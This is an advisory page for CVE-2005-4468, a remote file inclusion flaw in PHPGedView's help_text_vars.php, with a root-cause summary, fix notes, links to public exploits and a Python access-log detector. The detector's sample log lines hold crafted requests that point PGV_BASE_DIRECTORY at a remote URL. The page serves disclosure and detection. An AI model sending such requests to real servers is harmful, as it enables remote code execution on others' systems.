VYPR
Unrated severity · NVD Advisory · Published Dec 22, 2005 · Updated Jun 16, 2026

CVE-2005-4468

Description

PHP remote file include vulnerability in help_text_vars.php in PHPGedView 3.3.7 and earlier allows remote attackers to execute arbitrary code via a URL in the PGV_BASE_DIRECTORY parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability mechanics

Root cause

"The application fails to properly sanitize user-supplied input in the PGV_BASE_DIRECTORY parameter, allowing for remote file inclusion."

Attack vector

A remote attacker can send a crafted URL to the `help_text_vars.php` script. This URL includes a `PGV_BASE_DIRECTORY` parameter containing a malicious path to a remote file. When the script processes this parameter without proper validation, it can be tricked into including and executing arbitrary code from the specified remote location [ref_id=1].
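A detection check for the request pattern described above, as an added example that is not part of the advisory or of PHPGedView's code. It scans access-log lines for requests to `help_text_vars.php` whose `PGV_BASE_DIRECTORY` value decodes to a URL; the combined-log layout, the `find_rfi_attempts` name and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

SCRIPT = "help_text_vars.php"   # script named in the advisory
PARAM = "PGV_BASE_DIRECTORY"    # parameter named in the advisory

# Combined-log prefix: client, [timestamp], "METHOD target ..."
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*"')
# Decoded value that begins with a URL scheme (http://, ftp://, ...)
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.\-]*://', re.IGNORECASE)

# Constructed sample lines (documentation addresses, reserved host name).
SAMPLE_LOG = """\
192.0.2.10 - - [22/Dec/2005:10:00:01 +0000] "GET /phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=http%3A%2F%2Fhost.example%2F HTTP/1.1" 200 512
192.0.2.11 - - [22/Dec/2005:10:00:05 +0000] "GET /phpgedview/index.php?ged=family.ged HTTP/1.1" 200 8841
192.0.2.12 - - [22/Dec/2005:10:00:09 +0000] "GET /phpgedview/help_text_vars.php?lang=en&PGV_BASE_DIRECTORY=FTP://host.example/x HTTP/1.1" 200 512
192.0.2.13 - - [22/Dec/2005:10:00:12 +0000] "GET /phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=./ HTTP/1.1" 200 2048
"""

def find_rfi_attempts(log_text):
    """Return (client, timestamp, decoded value) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed layout
        client, stamp, _method, target = m.groups()
        url = urlsplit(target)
        # Compare the decoded file name so help_text_vars%2Ephp still matches.
        if unquote(url.path).rsplit("/", 1)[-1].lower() != SCRIPT:
            continue
        # parse_qsl percent-decodes each value once.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name == PARAM and SCHEME_RE.match(value):
                hits.append((client, stamp, value))
    return hits

if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print(*hit, sep="\t")
```

Only the query string is inspected here; a value sent in a request body does not appear in an access log and needs a WAF or application-level log to be seen.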

Affected code

The vulnerability exists in the `help_text_vars.php` file in PHPGedView version 3.3.7 and earlier [ref_id=1].

What the fix does

The patch updates the `help_text_vars.php` file to include proper validation for the `PGV_BASE_DIRECTORY` parameter [ref_id=1]. This prevents the script from including arbitrary remote files, thereby mitigating the remote file inclusion vulnerability and stopping attackers from executing arbitrary code.

Preconditions

  • input: The attacker must be able to control the value of the `PGV_BASE_DIRECTORY` parameter.
  • network: The vulnerable script must be accessible over the network.

Reproduction

The following public exploit references demonstrate how to reproduce this vulnerability:

  • http://rgod.altervista.org/phpgedview_337_xpl.html
  • http://www.securityfocus.com/bid/15983

Generated on Jun 3, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
